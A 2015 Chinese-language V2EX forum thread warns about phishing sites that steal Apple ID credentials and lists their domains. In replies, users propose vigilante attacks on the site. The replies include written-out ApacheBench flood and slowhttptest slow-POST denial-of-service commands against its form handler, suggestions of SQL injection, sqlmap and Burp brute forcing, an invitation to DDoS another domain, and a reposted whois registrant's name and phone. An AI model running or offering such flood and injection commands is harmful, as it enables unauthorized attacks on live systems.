V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
kchum

发现个骗取 Apple ID 密码的网站,大家留心!

  •  
  •   kchum · Feb 4, 2015 · 4561 views
    This topic created in 4100 days ago, the information mentioned may be changed or developed.
    切勿登录
    www.id-appleid-apple.com

    简单查了下 whois 信息,以下域名都应该是同一站点。
    find.appidlacksye.com
    activationicloudid.com
    appidlacksye.com
    28 replies    2015-02-05 20:47:02 +08:00
    aheadlead
        1
    aheadlead  
       Feb 4, 2015
    有谁有兴趣去sqlmap一下吗..
    naver1
        2
    naver1  
       Feb 4, 2015
    已举报到360,其他平台要举报太麻烦了。。。
    xiaozhizhu1997
        3
    xiaozhizhu1997  
       Feb 4, 2015 via Android
    查IP看看能不能投诉到机房…
    aaronlam
        4
    aaronlam  
       Feb 4, 2015
    这域名也是醉了,看到页面后更醉!
    wdlth
        5
    wdlth  
       Feb 4, 2015
    我只能说非Verisign EV SSL请勿钓鱼
    nobita
        6
    nobita  
       Feb 4, 2015
    safari已经有了警告
    creamiced
        7
    creamiced  
       Feb 4, 2015
    那个确认按钮忘记修边了啊
    rainy3636
        8
    rainy3636  
       Feb 5, 2015
    chrome也已有警告
    rainy3636
        9
    rainy3636  
       Feb 5, 2015
    写了个假id假密码,提示错误后给我跳到了真icloud…
    quake0day
        10
    quake0day  
       Feb 5, 2015
    @rainy3636 你可以写一些骂人的话,或者不停的post垃圾上去,反正这些都会被记录到数据库,可以显著增加他们查对正确账号的时间成本。另外可以试试sql注入。
    lisonfan
        11
    lisonfan  
       Feb 5, 2015   ❤️ 2
    canky
        12
    canky  
       Feb 5, 2015 via iPhone
    我觉得开burp suite爆破模式提交一些垃圾不错
    futursolo
        13
    futursolo  
       Feb 5, 2015
    这破网站居然还有移动版。。。
    msg7086
        14
    msg7086  
       Feb 5, 2015   ❤️ 2
    echo '[email protected]&sjpass=test' > p
    ab -n 100000 -c 1000 -p p -T 'application/x-www-form-urlencoded' http://www.id-appleid-apple.com/Save.asp

    默默地按下回车
    lovelinghan
        15
    lovelinghan  
       Feb 5, 2015 via Android
    @msg7086 这个好
    m939594960
        16
    m939594960  
       Feb 5, 2015
    @msg7086 DELETE FROM user WHERE sjname='[email protected]'
    shippo7
        17
    shippo7  
       Feb 5, 2015 via iPhone
    写脚本疯狂提交垃圾数据
    dotpig
        18
    dotpig  
       Feb 5, 2015
    Chrome 大红色的钓鱼诱骗提醒,还是蛮喜庆的。
    DearTanker
        19
    DearTanker  
       Feb 5, 2015
    已经蹦了,你们好厉害啊。
    TangMonk
        20
    TangMonk  
       Feb 5, 2015
    @msg7086 酷炫,又学到一招

    但是为啥显示:
    Benchmarking www.id-appleid-apple.com (be patient)
    apr_socket_recv: Connection reset by peer (54)
    vvard3n
        21
    vvard3n  
       Feb 5, 2015
    来个py脚本吧?
    tmqhliu
        22
    tmqhliu  
       Feb 5, 2015
    这都是骗子用来给被盗的 Apple 手机钓鱼的,目的就是骗得机主的 Apple ID 和密码,以及密保信息。这种网站成本很低,做一个就转移了,很难打击。只能自己多多留心了
    carvizerw
        23
    carvizerw  
       Feb 5, 2015
    不知道这哥们是不是用真实信息注册的域名
    Registrant Name: he yaolong
    Registrant Organization: he yaolong
    Registrant Street: yexianbaoanzhenliwuzhuangwuzu
    Registrant City: pingdingshan
    Registrant State/Province: Henan
    Registrant Postal Code: 467200
    Registrant Country: CN
    Registrant Phone : +86.03756173999
    Registrant Phone Ext:
    Registrant Fax: +86.03756173999
    naver1
        24
    naver1  
       Feb 5, 2015
    哈哈,站长受不了了,域名都跳到百度了。。。
    msg7086
        25
    msg7086  
       Feb 5, 2015   ❤️ 1
    @m939594960 只是举个栗子罢了。请自行上伪真实数据。
    再给你们一个玩法。
    sudo aptitude install slowhttptest -y
    slowhttptest -c 5000 -t POST -u http://www.id-appleid-apple.com/Save.asp -l 3600

    OPENVZ慎用。请仅用于打击恶势力。
    laukwanchan
        26
    laukwanchan  
       Feb 5, 2015
    你们都把他们玩坏了好么
    dndx
        27
    dndx  
       Feb 5, 2015
    又发现了一个,欢迎大家 DDOS:

    http://www.apple-id-scr.com/
    nyanyh
        28
    nyanyh  
       Feb 5, 2015
    系統提示:參數錯誤或被Syn攻擊,請檢查!

    233333
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3197 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 94ms · UTC 14:15 · PVG 22:15 · LAX 07:15 · JFK 10:15
    ♥ Do have faith in what you're doing.